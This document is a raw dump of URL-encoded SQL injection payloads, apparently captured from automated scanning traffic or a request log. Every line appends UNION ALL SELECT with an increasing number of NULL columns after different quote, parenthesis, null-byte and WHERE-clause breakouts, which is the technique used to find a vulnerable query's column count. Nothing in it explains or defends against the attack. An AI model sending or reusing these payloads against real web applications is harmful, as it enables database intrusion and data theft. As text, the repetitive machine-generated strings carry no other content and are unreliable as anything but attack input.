1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20WHERE%204136%3D4136%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20WHERE%203499%3D3499%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20WHERE%204101%3D4101%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20WHERE%208748%3D8748%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20WHERE%201554%3D1554%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20WHERE%201912%3D1912%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20WHERE%208325%3D8325%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20WHERE%204371%3D4371%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20WHERE%203995%3D3995%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20WHERE%209765%3D9765%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20WHERE%209620%3D9620%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20WHERE%207556%3D7556%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20WHERE%205289%3D5289%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20WHERE%203302%3D3302%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 